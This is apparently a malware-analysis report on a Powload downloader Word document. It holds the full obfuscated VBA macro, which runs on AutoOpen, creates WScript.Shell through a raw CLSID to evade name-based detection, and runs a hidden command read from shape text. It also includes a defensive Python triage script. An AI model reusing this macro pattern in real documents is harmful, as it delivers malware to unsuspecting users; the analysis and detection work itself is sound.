Verdict: MALICIOUS
Risk score: 252
Heuristics: 9
- ClamAV: Doc.Downloader.Powload-6770633-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Downloader.Powload-6770633-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings). Document contains VBA macro code.
- VBA instantiates a dangerous COM class by CLSID (critical, OLE_VBA_GETOBJECT_CLSID_DANGEROUS). VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on. Matched lines in script:
    UDBXZHrlN = 210955916 + CByte(phnEV - Sqr(iAKszvfVr)) * RQkVTZEE - atvQoiBv * kKEUq / CDate(287462199) * 330932111 * 262098934 / (95403459 - Sin(26986904))
    Set KHwDwckDO = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
    On Error Resume Next
  The CLSID 72C24DD5-D70A-438B-8A42-98424B88AFB8 is the one Windows registers for WScript.Shell, so KHwDwckDO is a WshShell object. Later in the macro its Run method is called with a command string assembled from shape text and a window-style argument of 0, which hides the window. A rule that only matches the ProgID string "WScript.Shell" sees nothing in this sample; match the CLSID as well, with and without braces.
- GetObject call (high, OLE_VBA_GETOBJ). Matched lines in script: the same three lines as in the finding above.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched lines in script:
    Attribute VB_Customizable = True
    Sub AutoOpen()
    On Error Resume Next
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD). The matched string is not reproduced in this report, and the recovered macro source shown below contains no cmd.exe literal: the command the macro passes to Run is read at run time from the text of shape BJcpJnozUIw, which lives in the document body rather than in the VBA project.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC). OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. In this sample a VBA project was in fact recovered (macros.bas under Extracted artifacts), so this marker adds nothing beyond the VBA findings.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE). One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace identifier that any document carrying drawing objects, such as the shape this macro reads, contains; it is not a network indicator.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10639 bytes | f4a137dd333a87ad5646cf6c395099b84b2a116c5ccf0ffbfaa4fcd3e3e0c187 |

Detection (macros.bas)
- ClamAV: No threats found. The Powload signature above fired on the container document; the decoded VBA text on its own carries no ClamAV hit.
- Obfuscation or payload: likely. 186 of 273 identifiers look randomly generated (e.g. 'BJcpJnozUIw'), consistent with name-mangling obfuscation.
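The two analyst-facing points in this report, the CLSID-based instantiation that ProgID matching misses and the random-identifier heuristic, can be reproduced directly on the decoded macro text. The Python below is an added example written for this page, not the analyzer's code and not part of olevba: it slices the AutoOpen body backwards from its execution sinks so the filler statements fall away, resolves GetObject("new:<CLSID>") against a small CLSID table of this example's own choosing (the WScript.Shell entry is the CLSID Windows registers for that class; Shell.Application is a second entry added for illustration), follows the Run call to its window-style constant and to the shape whose text supplies the command, and scores identifiers with a randomness rule of this example's own design, since the page does not publish the analyzer's scoring rule. MACRO is an excerpt of the macros.bas preview below with most of the filler blocks omitted; the function and constant names are the example's own.

```python
"""Triage an olevba-extracted macro: slice the junk-padded AutoOpen down to its execution
chain, resolve GetObject("new:<CLSID>") to a class, and count random-looking identifiers.
Added example, not the analyzer's code; the CLSID table and looks_random() rules are its own."""
import re

# Excerpt of the macros.bas preview on this page; most filler blocks are omitted.
MACRO = '''Attribute VB_Name = "ukAOzli"
Sub AutoOpen()
On Error Resume Next
Select Case QqGtA
Case 207479976
VlrZSE = 299451022
OtHVAF = dWLLzb
End Select
tcLtGdwjw = 192601230 + CByte(awKBzOwJM - Sqr(WEKCCdwYj)) * YPLBlSOI
Set SvVKl = Shapes("BJcpJnozUIw")
knNwZmwi = "" + IYmASkF + OUJVTkOd + SvVKl.TextFrame.TextRange.Text + jOiHhB
Set KHwDwckDO = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
Const jwpVzajEwiI = 0
KHwDwckDO.Run@ knNwZmwi, jwpVzajEwiI
End Sub
'''
DANGEROUS_CLSIDS = {  # execution-capable COM classes reachable by raw CLSID (this example's table)
    "72C24DD5-D70A-438B-8A42-98424B88AFB8": "WScript.Shell (WshShell)",
    "13709620-C279-11CE-A49E-444553540000": "Shell.Application",
}
# VBA keywords, built-ins and Word object-model members are not attacker-chosen names.
SKIP = {"sub", "end", "select", "case", "set", "on", "error", "resume", "next", "const", "cbyte",
        "cdate", "chrw", "sqr", "sin", "getobject", "createobject", "shapes", "textframe", "textrange", "text", "run"}
IDENT = re.compile(r"\b[A-Za-z_]\w*\b")
STRING = re.compile(r'"(?:[^"]|"")*"')  # VBA escapes a quote by doubling it
CLSID_NEW = re.compile(r'Set\s+(\w+)\s*=\s*GetObject\(\s*"new:\{?([0-9A-Fa-f-]{36})\}?"\s*\)', re.I)
VOWELS = set("aeiouAEIOU")


def statements(vba):
    """Stripped non-empty lines, minus the Attribute header."""
    return [l.strip() for l in vba.splitlines() if l.strip() and not l.startswith("Attribute ")]


def identifiers(line):
    """Attacker-chosen identifiers in one statement; string contents are ignored."""
    return {i for i in IDENT.findall(STRING.sub('""', line)) if i.lower() not in SKIP}


def skeleton(vba):
    """Backward slice: keep the sinks (GetObject, Shapes, .Run, Sub/End Sub) and every
    assignment feeding a name they use, iterated to a fixpoint; the filler drops out."""
    body = statements(vba)
    keep = [l for l in body if re.search(r"GetObject\(|Shapes\(|\.Run\b", l) or l.startswith(("Sub ", "End Sub"))]
    wanted = set().union(*(identifiers(l) for l in keep))
    grew = True
    while grew:
        grew = False
        for l in body:
            m = re.match(r"(?:Set|Const)?\s*(\w+)\s*=(.*)", l)
            if m and m.group(1) in wanted and l not in keep:
                keep.append(l)
                wanted |= identifiers(m.group(2))
                grew = True
    return [l for l in body if l in keep]


def clsid_instantiations(vba):
    """(variable, CLSID, class or 'unknown') for each GetObject("new:...") call."""
    hits = (CLSID_NEW.search(l) for l in statements(vba))
    return [(m.group(1), m.group(2).upper(), DANGEROUS_CLSIDS.get(m.group(2).upper(), "unknown")) for m in hits if m]


def run_sink(vba):
    """Find obj.Run <cmd>, <style>; resolve <style> (0 hides the window for WshShell.Run)
    and report whether <cmd> is assembled from a shape's text rather than from a literal."""
    body = statements(vba)
    call = next((m for m in (re.search(r"(\w+)\.Run\b\W*(\w+)\s*,\s*(\w+)", l) for l in body) if m), None)
    if not call:
        return None
    obj, cmd, style = call.groups()
    style_val = next((int(m.group(1)) for m in (re.match(rf"Const\s+{style}\s*=\s*(\d+)", l) for l in body) if m), None)
    shapes = {m.group(1): m.group(2) for m in (re.match(r'Set\s+(\w+)\s*=\s*Shapes\("([^"]+)"\)', l) for l in body) if m}
    cmd_line = next((l for l in body if re.match(rf"{cmd}\s*=", l)), "")
    source = next((f'Shapes("{n}").TextFrame.TextRange.Text' for v, n in shapes.items() if f"{v}.TextFrame" in cmd_line), None)
    return {"object": obj, "command_var": cmd, "window_style": style_val, "hidden": style_val == 0, "command_source": source}


def looks_random(name):
    """Name-mangling heuristic (this example's rules): a consonant run of 5+, two or more
    lower->upper flips with few vowels, or a name of 6+ letters with almost no vowels."""
    letters = [c for c in name if c.isalpha()]
    run = longest = 0
    for c in letters:
        run = 0 if c in VOWELS else run + 1
        longest = max(longest, run)
    humps = sum(a.islower() and b.isupper() for a, b in zip(letters, letters[1:]))
    ratio = sum(c in VOWELS for c in letters) / max(len(letters), 1)
    return longest >= 5 or (humps >= 2 and ratio < 0.35) or (len(letters) >= 6 and ratio <= 0.15)


def random_identifier_ratio(vba):
    """(random-looking, total) over the distinct attacker-chosen identifiers in the macro."""
    names = set().union(*(identifiers(l) for l in statements(vba)))
    return sum(looks_random(n) for n in names), len(names)


if __name__ == "__main__":
    print("\n".join(skeleton(MACRO)), clsid_instantiations(MACRO), run_sink(MACRO), sep="\n")
    print("random identifiers: %d of %d" % random_identifier_ratio(MACRO))
```

On the excerpt the slice reduces fifteen statements to the seven that matter (Sub, the Shapes lookup, the string assembly, the GetObject, the Const, the Run call, End Sub), the CLSID resolves to WScript.Shell, the Run call is reported as hidden with its command sourced from Shapes("BJcpJnozUIw"), and 13 of 16 identifiers are flagged as random. The heuristic is deliberately simple and will both miss some mangled names (OtHVAF passes) and flag some legitimate camel-case ones; treat the ratio as a triage signal in the spirit of the analyzer's 186 of 273, not as a verdict.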
Preview of the extracted script (the analyzer shows the first 1,000 lines; this module ends at End Sub within that limit, so it is shown in full)
Attribute VB_Name = "ukAOzli"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case QqGtA
Case 207479976
VlrZSE = 299451022
OtHVAF = dWLLzb
IjjMawl = 106745835
Case 107898840
vDuOdH = ChrW(93024130)
mhFDV = CDate(195219158)
wANkip = 211030311
End Select
tcLtGdwjw = 192601230 + CByte(awKBzOwJM - Sqr(WEKCCdwYj)) * YPLBlSOI - qBGabDN * zNVljTzW / CDate(158035072) * 2226809 * 281762672 / (25683830 - Sin(340286475))
On Error Resume Next
Select Case ArwIvkR
Case 338631635
wDfzkiM = 72369984
wjszESpc = irCvDz
HtBJibF = 190152885
Case 189045435
IHjii = ChrW(199161488)
wBQiDnfT = CDate(127773702)
mHZAAfZ = 191142474
End Select
LBAWiPUz = 62614654 + CByte(wjzNTzBj - Sqr(EFVqOESVC)) * IcGBt - hvfmSi * WmWnnuGAw / CDate(318811003) * 230042775 * 162051587 / (209649273 - Sin(276687884))
Set SvVKl = Shapes("BJcpJnozUIw")
On Error Resume Next
Select Case FiGJQh
Case 288977756
jRQjclJ = 148076343
lddloddSM = NwikEEW
tilquXtzk = 266433336
Case 27956869
iXwlEVhhQ = ChrW(6498867)
rDLiiwj = CDate(75445542)
FvQsGuj = 34385337
End Select
qtoNSopzw = 213291609 + CByte(WpYsAumj - Sqr(PzDdcpmHG)) * JmcoZHo - lXojBAb * PXYrM / CDate(54341683) * 341753871 * 78460309 / (192504251 - Sin(287886649))
On Error Resume Next
Select Case zHzcO
Case 170116777
COckLjw = 183115602
cGMOOdqzz = EZUBfoQnw
fidCzhSr = 79001614
Case 237505932
IitolD = ChrW(298629480)
TRAfPVDh = CDate(84578013)
wusBvUwcJ = 96865586
End Select
KwnNivva = 86018884 + CByte(lXzcOfwOh - Sqr(zFuPpYHiZ)) * ItiHITMSh - IHzCKXt * jpzOcSh / CDate(32776549) * 24001710 * 154392063 / (155105048 - Sin(64053165))
On Error Resume Next
Select Case KOYnfwG
Case 266083784
uumKN = 24655143
wbzVLdpQ = jXtpzs
aXNKrv = 237847499
Case 142496010
zJQnfSiEi = ChrW(52666106)
jHShZH = CDate(138690383)
YNwJCjMmA = 296866895
End Select
CribNUYcm = 106963144 + CByte(oGpfdSFfl - Sqr(aowjzzOH)) * fiLnFW - jENBi * fjYrTXCt / CDate(222129276) * 136328655 * 52533149 / (78930502 - Sin(183651928))
knNwZmwi = "" + IYmASkF + OUJVTkOd + QHHfr + wJDbdS + SvVKl.TextFrame.TextRange.Text + jOiHhB + qsrIPvR + jvQmH
On Error Resume Next
Select Case QqlTE
Case 13691448
fLDsK = 240126674
sWBKKXKR = HULdk
IUQrsaJiC = 86387499
Case 132090265
pYIiZT = ChrW(132381350)
PHFllzzhd = CDate(336713111)
YYnDicSrG = 233569995
End Select
zzqIUszY = 307663023 + CByte(JldBOfFvb - Sqr(FDUvqCV)) * GGcNObH - uccGi * EBPmK / CDate(9445290) * 130222222 * 322766912 / (85313016 - Sin(316452082))
On Error Resume Next
Select Case XbfKG
Case 229550800
aXsoqa = 138761056
uYNTsBbXT = GClqE
GwLtjA = 66764012
Case 261452801
qXLKkBvo = ChrW(109808961)
HODlFvE = CDate(75649913)
zffkT = 164590768
End Select
uPbQuNZf = 16229267 + CByte(PMiCLOV - Sqr(wFCKFz)) * oDoIKns - CHfNAjtp * jbjrcDn / CDate(114995652) * 71103498 * 132878537 / (148692652 - Sin(131476834))
On Error Resume Next
Select Case MjdKPh
Case 324258949
POaDS = 59726801
jMQHiZkSI = jOihLoiM
wJCYrLOWj = 315380887
Case 232992266
rdVBHwB = ChrW(165059207)
bQUXjTOb = CDate(26793207)
rrZMkjo = 166230317
End Select
UDBXZHrlN = 210955916 + CByte(phnEV - Sqr(iAKszvfVr)) * RQkVTZEE - atvQoiBv * kKEUq / CDate(287462199) * 330932111 * 262098934 / (95403459 - Sin(26986904))
Set KHwDwckDO = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
On Error Resume Next
Select Case PBiPMJW
Case 273881768
wOsbtiYdX = 241284956
hSpjzJsMv = zGANoYZ
lnsJq = 148203443
Case 187634844
Zzaoj = ChrW(178687480)
zrzLBRD = CDate(111538328)
uWwHs = 87770190
End Select
FwZmz = 1811300 + CByte(cSEnjul - Sqr(rYcAV)) * MXlhWiPUZ - RMtUpK * jzUUszdT / CDate(146672095) * 158697408 * 266175597 / (206497103 - Sin(159619851))
On Error Resume Next
Select Case GTzzHQudM
Case 313537263
XGoDipYt = 217449229
kFDKRFc = brBVDum
poiiwdf = 108967385
Case 106092274
PGOzKiYP = ChrW(143443694)
vnpKSH = CDate(240142883)
hCDuQ = 86339930
End Select
kPwcHZnuf = 278259890 + CByte(IihXwnY - Sqr(ZCwTQrt)) * jNiUpBz - PZnOoIt * UvwGW / CDate(63763719) * 37667098 * 104100602 / (148367102 - Sin(293987940))
On Error Resume Next
Select Case HYwniqp
Case 273393421
BfraHhT = 289582338
wDToBKArT = JULARiDC
NGjfrCMqr = 199418622
Case 172197406
tHULsBS = ChrW(147140370)
nrXAfEqf = CDate(169150993)
EicinMYcm = 272326300
End Select
JMtKPM = 281274782 + CByte(ZdkjDaOM - Sqr(LzVLSiV)) * RdjzU - jjSdiip * sApAST / CDate(329469683) * 166520167 * 28896879 / (164722352 - Sin(1103234))
On Error Resume Next
Select Case fRJqz
Case 317260428
PwoHoR = 29145921
iwoZOV = GKCrd
LmbJjbIiw = 206475133
Case 140998007
CmDDQSh = ChrW(150352547)
JOUNlkYK = CDate(330711729)
ISQDMNwF = 276440469
End Select
pmTSEMjDC = 303491783 + CByte(KGICXGww - Sqr(kTwsMClir)) * SNrbwXvBJ - AVIEDwM * BoGCG / CDate(334052246) * 73689809 * 141895035 / (264502370 - Sin(178337277))
On Error Resume Next
Select Case HpPAmdu
Case 237100931
FEbzrpHa = 268183957
waPQQ = MwdALbSGO
QcMJlTo = 320990399
Case 63199282
FYJGkk = ChrW(97671471)
zvsYwBZj = CDate(108427481)
bdlUiWZi = 89482616
End Select
WclSHAtn = 259537524 + CByte(QaMiJTc - Sqr(iLjECFUfi)) * pnhGXjNU - ZRzHl * tTAQDLPth / CDate(1049347) * 16408803 * 314279488 / (121056263 - Sin(171274524))
Const jwpVzajEwiI = 0
On Error Resume Next
Select Case GKuFH
Case 149585934
wCmYGTjMv = 18810428
DpzRsf = zlbNvOT
ndPCUJnPb = 313275651
Case 105972853
bTrnc = ChrW(248453575)
ZpKoRPaJ = CDate(248136385)
iHXFJj = 21510892
End Select
siLQaXWcb = 20744940 + CByte(tnlJftH - Sqr(pwntzBw)) * nszRmoqjD - JOnRonX * rizwsLC / CDate(21162044) * 92264774 * 333237460 / (35697190 - Sin(267348103))
On Error Resume Next
Select Case jwfrI
Case 168108317
JDrPPz = 176677001
nQbKlvraH = DiAHwFfV
RZdJhjIO = 56432167
Case 254051211
fOmdqFlmS = ChrW(75215942)
YYEFuKCH = CDate(247762787)
tIJXKGtd = 192019402
End Select
inPHosWR = 282913251 + CByte(tDdcBE - Sqr(cmzLB)) * JmGcG - wrIpiFkJ * QColQRpqi / CDate(213955476) * 148378738 * 39480446 / (11448632 - Sin(115557953))
On Error Resume Next
Select Case wJumr
Case 79490895
UJcLPaOjw = 48060064
fZrFP = IjIdKp
AZkUToiE = 312159033
Case 13175631
ATQQEST = ChrW(170094731)
skHQq = CDate(301975105)
iIDTJTt = 77017648
End Select
quMHZFjXM = 34553900 + CByte(BripKkkqQ - Sqr(TdZMEv)) * iUjaEaNXG - jnAjEl * amdOIYjCv / CDate(165209733) * 155917143 * 115002528 / (257744718 - Sin(309065409))
KHwDwckDO.Run@ knNwZmwi, jwpVzajEwiI
On Error Resume Next
Select Case TEYbtTKp
Case 56244423
skEjlXnf = 320215791
UXDiaS = QPobMqnqL
KwEwfB = 236371283
Case 245646509
RacASIVrV = ChrW(321195658)
pAbWt = CDate(175714192)
EftRpZ = 60580020
End Select
jsWoVTz = 179606579 + CByte(WoOWS - Sqr(wStKYKXiD)) * hfFFz - DrpcdUjb * sZazFMzm / CDate(263825522) * 308428506 * 332966488 / (316605852 - Sin(96201009))
On Error Resume Next
Select Case EXLJoUOEv
Case 119584602
iREvJ = 196998000
jbINaSJi = nvqGj
OFdkCAjA = 244618140
Case 152930369
cHsXq = ChrW(330019154)
hvojrwt = CDate(342044482)
PbJFL = 129447707
End Select
DzSYbkzbX = 275420634 + CByte(qCqhwzR - Sqr(oufOjrC)) * UYbSoILoY - ZzzwNLB * DzPhiMn / CDate(254913395) * 206584977 * 8754585 / (160014467 - Sin(246573680))
On Error Resume Next
Select Case ZQMikFiKb
Case 148419186
CvaKzzvQK = 146293795
codlfhYVb = Tzruo
DBoJri = 42754228
Case 249235358
atZQZZFZi = ChrW(265558227)
AzaAlGu = CDate(259320132)
wiQLmrPW = 86496785
End Select
ziroE = 262025541 + CByte(ECiOXNFQJ - Sqr(anXkk)) * CzscNi - JjMZqpJL * NlBrJUa / CDate(135159969) * 70347871 * 304511946 / (186731742 - Sin(261176749))
On Error Resume Next
Select Case uiJEkVF
Case 45323015
osSZbz = 206892295
hmAfWzXl = VUrIq
AZwmqSW = 49778636
Case 138913993
GTJhBu = ChrW(274742262)
bzJSwY = CDate(247386274)
SbzkOHwV = 115740286
End Select
dMpVLifRP = 194654855 + CByte(DHbfhj - Sqr(NidZAEzuI)) * wwVnQCRd - GoimiII * PTYFhbG / CDate(53891224) * 231923011 * 142238564 / (22203487 - Sin(76883465))
On Error Resume Next
Select Case FMitkrVIf
Case 33761359
qvpIjoF = 273187723
hXjzwOKG = jDYwVpX
pSSQiGc = 159610001
Case 11817999
lAjCjQjJh = ChrW(190621806)
zWjOlwBz = CDate(308245926)
AlGwmWS = 19229902
End Select
HbuYZF = 277391457 + CByte(UIMMHuss - Sqr(mCtKaYGQl)) * aEwtQG - VGCzGI * PhrhNsqNF / CDate(278404705) * 237001508 * 108111729 / (63286372 - Sin(35981281))
End Sub